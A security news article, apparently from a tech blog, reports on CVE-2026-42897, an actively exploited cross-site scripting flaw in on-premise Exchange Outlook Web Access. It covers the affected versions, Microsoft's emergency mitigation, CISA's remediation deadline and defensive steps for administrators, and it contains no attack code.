CVE-2026-42897: Microsoft Exchange Zero-Day Is Being Exploited Right Now — Patch Immediately

Microsoft has confirmed that a newly disclosed security vulnerability in on-premise Exchange Server — tracked as CVE-2026-42897 — is being actively exploited in the wild. The flaw, rated 8.1 on the CVSS scale, allows an attacker to execute arbitrary JavaScript in a victim’s browser simply by sending them a crafted email. No malicious attachment needed. No link to click. Just opening the email in Outlook Web Access (OWA) can be enough to trigger the attack under certain conditions.

CISA added CVE-2026-42897 to its Known Exploited Vulnerabilities catalog on May 15, requiring all Federal Civilian Executive Branch agencies to remediate by May 29. If you’re running Exchange Server 2016, 2019, or the Subscription Edition and you haven’t applied Microsoft’s emergency mitigation, you need to act today.

How CVE-2026-42897 Works

At its technical core, CVE-2026-42897 is a cross-site scripting (XSS) vulnerability in Exchange Server’s Outlook Web Access interface — the browser-based email client used by millions of corporate employees worldwide.

The attack chain is deceptively simple:

• An attacker crafts a malicious email containing hidden XSS payload code.
• When a target opens the email in OWA, the Exchange Server fails to properly sanitize the email content.
• The malicious JavaScript executes in the context of the victim’s authenticated browser session.
• From there, the attacker can steal session cookies, credentials, NTLM hashes, or pivot to further attacks against the organization’s internal network.

What makes this particularly dangerous is the attack’s passive nature. There is no phishing link to click, no attachment to open. An employee simply checking their email — a thing they do dozens of times per day — can silently compromise their session. Security-aware users who have been trained to “never click suspicious links” have no defense against a malicious email that requires only reading.

According to Security Affairs, Microsoft confirmed active exploitation but has not disclosed the identity of threat actors, the scale of attacks, or which organizations have been targeted — a frustratingly common gap in Microsoft’s vulnerability disclosures.

Who Is Affected

The vulnerability affects all major on-premise Exchange Server versions:

• Exchange Server 2016 — all Cumulative Update levels
• Exchange Server 2019 — all Cumulative Update levels
• Exchange Server Subscription Edition — all update levels

Critically, Microsoft Exchange Online (cloud) is not affected. Organizations that migrated to Microsoft 365 or Exchange Online are safe from this specific vulnerability. The risk is entirely concentrated in on-premises deployments — which still represents tens of thousands of organizations worldwide, particularly in regulated industries (healthcare, finance, government) and enterprises with legacy infrastructure they cannot easily move to the cloud.

If you’re using Exchange on-premises and accessing email via OWA, consider this critical and treat it accordingly.

Microsoft’s Emergency Mitigations

Microsoft has not yet released a full security update patch for CVE-2026-42897. Instead, the company pushed interim mitigation measures through the Exchange Emergency Mitigation Service (EEMS) — a mechanism introduced after the catastrophic ProxyLogon vulnerabilities of 2021 that allows Microsoft to push temporary fixes to Exchange servers automatically.

The EEMS mitigation for CVE-2026-42897 has been deployed to servers that have the service enabled and are connected to Microsoft’s update infrastructure. However, organizations in air-gapped environments, those who have disabled EEMS, or those running heavily customized Exchange deployments may not have received the automatic mitigation.

Administrators should verify EEMS status immediately. Instructions are available in the Microsoft Community Hub advisory.

Additional manual mitigations include disabling OWA entirely for external access until the patch is available (drastic but effective), implementing WAF rules that strip or block the specific HTML tags used in the exploit, and enabling Enhanced Security Configuration in Internet Explorer-based OWA rendering modes.

Context: Exchange Server’s Ongoing Security Crisis

CVE-2026-42897 is not an anomaly — it’s part of a pattern. Exchange Server has been one of the most persistently targeted enterprise products in the world for half a decade. The ProxyLogon zero-days in 2021 were exploited by Chinese state hackers (Hafnium) to breach tens of thousands of organizations before patches were available. ProxyShell followed months later. ProxyNotShell in 2022. OWASSRF. MotionSSL. Each wave exploited the same fundamental architecture: a complex, internet-facing enterprise email server with a sprawling attack surface.

The question that security architects must now seriously confront: is on-premise Exchange Server still a defensible architecture in 2026? For most organizations, the honest answer is no. The migration costs and complexity that kept enterprises on-prem are real, but so is the perpetual stream of critical vulnerabilities. As Mandiant’s M-Trends 2026 found, time-to-exploit has gone negative — attackers are now routinely exploiting vulnerabilities before patches arrive. Legacy on-prem email servers are an increasingly untenable surface to defend.

What You Should Do Right Now

If you manage Exchange Server infrastructure, here is the priority action list for the next 48 hours:

• Verify EEMS is active and the CVE-2026-42897 mitigation has been applied. Check your Exchange Admin Center for mitigation status or run Get-Mitigations.ps1.
• Restrict OWA to internal access only until the official patch is released. If external OWA access is business-critical, put it behind a VPN or require client certificate authentication.
• Review your OWA access logs for anomalies going back to May 1. Look for unusual JavaScript execution patterns, unexpected session cookie usage, or evidence of lateral movement from accounts that regularly use OWA.
• Patch your WAF rules to block common XSS payloads if you have a web application firewall in front of your Exchange OWA endpoint.
• Accelerate your Exchange Online migration planning. CVE-2026-42897 is a symptom, not the disease. On-prem Exchange is a perpetual risk surface.

CISA’s Deadline: May 29

CISA’s Known Exploited Vulnerabilities (KEV) catalog mandate gives Federal Civilian Executive Branch agencies until May 29, 2026 to remediate CVE-2026-42897. While this mandate technically applies only to federal agencies, it serves as a signal to the private sector: this vulnerability is being actively exploited and requires urgent attention.

Non-federal organizations that wait for Microsoft’s official patch before acting are gambling that no threat actor has them in their sights in the meantime. Given the confirmed active exploitation — and the still-unknown identity of the attackers behind it — that is not a gamble worth taking.

Apply the interim mitigation today. Monitor for the official patch. And seriously reconsider whether on-premise Exchange is where you want to be when the next critical vulnerability drops — because there will be one.

For a broader picture of the 2026 vulnerability landscape, see our coverage of the cPanel zero-day CVE-2026-41940 and SudoFlare’s full cybersecurity coverage.